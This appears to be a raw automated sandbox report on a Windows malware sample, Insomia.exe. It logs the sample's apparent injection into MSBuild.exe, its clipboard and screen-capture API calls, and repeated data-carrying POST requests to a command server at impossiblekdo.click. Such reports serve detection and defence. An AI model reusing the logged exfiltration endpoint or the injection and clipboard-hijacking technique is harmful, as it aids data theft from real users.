Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5RVE3WIIQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20520Host: impossiblekdo.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=44JGQU7AQPCFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1220Host: impossiblekdo.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=D37LXU0WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569475Host: impossiblekdo.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: impossiblekdo.click

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 104.18.38.233
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 104.18.38.233
Source: unknown	TCP traffic detected without corresponding DNS query: 104.18.38.233
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 104.18.38.233
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: impossiblekdo.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: impossiblekdo.click

Source: Insomia.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Insomia.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Insomia.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Insomia.exe	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: MSBuild.exe, 00000002.00000002.3270264909.00000000010D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Insomia.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: Insomia.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: Insomia.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Insomia.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Insomia.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Insomia.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: Insomia.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: Insomia.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: Insomia.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: Insomia.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: Insomia.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: Insomia.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: Insomia.exe, 00000000.00000002.2121237108.0000000003411000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Insomia.exe, 00000000.00000002.2127928110.0000000004780000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2127928110.0000000004843000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2131761668.0000000006150000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Insomia.exe, 00000000.00000002.2127928110.0000000004780000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2127928110.0000000004843000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2131761668.0000000006150000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Insomia.exe, 00000000.00000002.2127928110.0000000004780000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2127928110.0000000004843000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2131761668.0000000006150000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: MSBuild.exe, 00000002.00000002.3270599450.0000000001107000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://impossiblekdo.click/
Source: MSBuild.exe, 00000002.00000002.3270062584.000000000105C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://impossiblekdo.click/api
Source: MSBuild.exe, 00000002.00000002.3270062584.000000000105C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://impossiblekdo.click/apiq
Source: Insomia.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: Insomia.exe, 00000000.00000002.2127928110.0000000004780000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2127928110.0000000004843000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2131761668.0000000006150000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Insomia.exe, 00000000.00000002.2127928110.0000000004780000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2127928110.0000000004843000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2131761668.0000000006150000.00000004.08000000.00040000.00000000.sdmp, Insomia.exe, 00000000.00000002.2121237108.0000000003411000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Insomia.exe, 00000000.00000002.2127928110.0000000004780000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2127928110.0000000004843000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2131761668.0000000006150000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: Insomia.exe	String found in binary or memory: https://www.mitec.cz0

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49719 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_00436B80 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_00436B80

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_032A1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

2_2_032A1000

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_00436B80 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_00436B80

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_0043759A GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

2_2_0043759A

Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_061BE150 NtProtectVirtualMemory,	0_2_061BE150
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_061BE149 NtProtectVirtualMemory,	0_2_061BE149
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_06210A10 NtResumeThread,	0_2_06210A10
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_06210A09 NtResumeThread,	0_2_06210A09

Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_016DC950	0_2_016DC950
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_016D5120	0_2_016D5120
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_016DF188	0_2_016DF188
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_016D1078	0_2_016D1078
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_016D2A2E	0_2_016D2A2E
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_016D8CB8	0_2_016D8CB8
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_016D1068	0_2_016D1068
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_016D8028	0_2_016D8028
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_016D38FC	0_2_016D38FC
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_016D9248	0_2_016D9248
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_016D9239	0_2_016D9239
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_016D8CA8	0_2_016D8CA8
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_016D4488	0_2_016D4488
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_016D7F70	0_2_016D7F70
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_016D370A	0_2_016D370A
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_016D7F10	0_2_016D7F10
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_016D7FC0	0_2_016D7FC0
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_05E9C5C8	0_2_05E9C5C8
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_05E92DE4	0_2_05E92DE4
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_05E99888	0_2_05E99888
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_05E9C19D	0_2_05E9C19D
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_05E91078	0_2_05E91078
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_05E9CC01	0_2_05E9CC01
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_05E99878	0_2_05E99878
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_05EE19A3	0_2_05EE19A3
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_05EE0040	0_2_05EE0040
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_05EEE049	0_2_05EEE049
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_05EEE058	0_2_05EEE058
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_05EE0006	0_2_05EE0006
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_05EF53E0	0_2_05EF53E0
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_05EF77E8	0_2_05EF77E8
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_05EF77D9	0_2_05EF77D9
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_05EF0040	0_2_05EF0040
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_05EF53CF	0_2_05EF53CF
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_060B001E	0_2_060B001E
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_060B0040	0_2_060B0040
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_060CB220	0_2_060CB220
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_060C9868	0_2_060C9868
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_060CB212	0_2_060CB212
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_060C7EB1	0_2_060C7EB1
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_060C7EC0	0_2_060C7EC0
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_060C9B41	0_2_060C9B41
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_060C93F8	0_2_060C93F8
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_060C9408	0_2_060C9408
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_060C0006	0_2_060C0006
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_060C7018	0_2_060C7018
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_060C7028	0_2_060C7028
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_060C0040	0_2_060C0040
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_060C9859	0_2_060C9859
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_060C98D3	0_2_060C98D3
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_060C116F	0_2_060C116F
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_061A0040	0_2_061A0040
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_061A1648	0_2_061A1648
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_061A0367	0_2_061A0367
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_061BAE08	0_2_061BAE08
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_061BADA9	0_2_061BADA9
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_06320006	0_2_06320006
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_06320040	0_2_06320040
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_0633E928	0_2_0633E928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040A01E	2_2_0040A01E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00428960	2_2_00428960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040D973	2_2_0040D973
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0043C900	2_2_0043C900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004089B0	2_2_004089B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00439A02	2_2_00439A02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00425A91	2_2_00425A91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0043CB40	2_2_0043CB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00443B40	2_2_00443B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00419B52	2_2_00419B52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004223B0	2_2_004223B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00444410	2_2_00444410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042FCB0	2_2_0042FCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004325B5	2_2_004325B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00435EF3	2_2_00435EF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004126F0	2_2_004126F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040AFA0	2_2_0040AFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0043C050	2_2_0043C050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042F85B	2_2_0042F85B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042A860	2_2_0042A860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00406000	2_2_00406000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00406830	2_2_00406830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00429838	2_2_00429838
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004260D0	2_2_004260D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004280D0	2_2_004280D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004430D0	2_2_004430D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004038E0	2_2_004038E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042B8E0	2_2_0042B8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004368E0	2_2_004368E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00444140	2_2_00444140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0043B15C	2_2_0043B15C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0043E101	2_2_0043E101
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0043D900	2_2_0043D900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040C1CF	2_2_0040C1CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004431E0	2_2_004431E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0041A190	2_2_0041A190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004231A0	2_2_004231A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00420260	2_2_00420260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0041BA1B	2_2_0041BA1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00409AD0	2_2_00409AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00402AE0	2_2_00402AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004432E0	2_2_004432E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004162E6	2_2_004162E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0041728C	2_2_0041728C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00404290	2_2_00404290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00405AB0	2_2_00405AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0043C2B0	2_2_0043C2B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00426350	2_2_00426350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00411B5A	2_2_00411B5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00443370	2_2_00443370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00442B00	2_2_00442B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042B310	2_2_0042B310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00431B23	2_2_00431B23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0041CB22	2_2_0041CB22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042B8E0	2_2_0042B8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004063A0	2_2_004063A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042A3A9	2_2_0042A3A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040B460	2_2_0040B460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0043546D	2_2_0043546D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00443400	2_2_00443400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00415C18	2_2_00415C18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042FC19	2_2_0042FC19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00414C30	2_2_00414C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042E4C0	2_2_0042E4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00428CC0	2_2_00428CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00440CD0	2_2_00440CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00428CE0	2_2_00428CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004274F0	2_2_004274F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0041DC80	2_2_0041DC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00417485	2_2_00417485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004084B0	2_2_004084B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00429D4A	2_2_00429D4A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00427D60	2_2_00427D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00440500	2_2_00440500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00416517	2_2_00416517
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00426531	2_2_00426531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004345C0	2_2_004345C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004095F0	2_2_004095F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00430D90	2_2_00430D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0041CB22	2_2_0041CB22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00407610	2_2_00407610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00408E10	2_2_00408E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00417E35	2_2_00417E35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_004366C0	2_2_004366C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0041C6D0	2_2_0041C6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00402EE0	2_2_00402EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00443E80	2_2_00443E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040A68C	2_2_0040A68C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040DE8E	2_2_0040DE8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0043069B	2_2_0043069B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0043DEA0	2_2_0043DEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00432EA5	2_2_00432EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00439EBB	2_2_00439EBB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042AF62	2_2_0042AF62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0041DFE0	2_2_0041DFE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004081A0 appears 48 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00414C20 appears 110 times

Source: Insomia.exe

Static PE information: invalid certificate

Source: Insomia.exe, 00000000.00000002.2120987067.00000000018AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Insomia.exe
Source: Insomia.exe, 00000000.00000002.2127928110.000000000460F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTvjeza.dll" vs Insomia.exe
Source: Insomia.exe, 00000000.00000002.2127928110.0000000004780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Insomia.exe
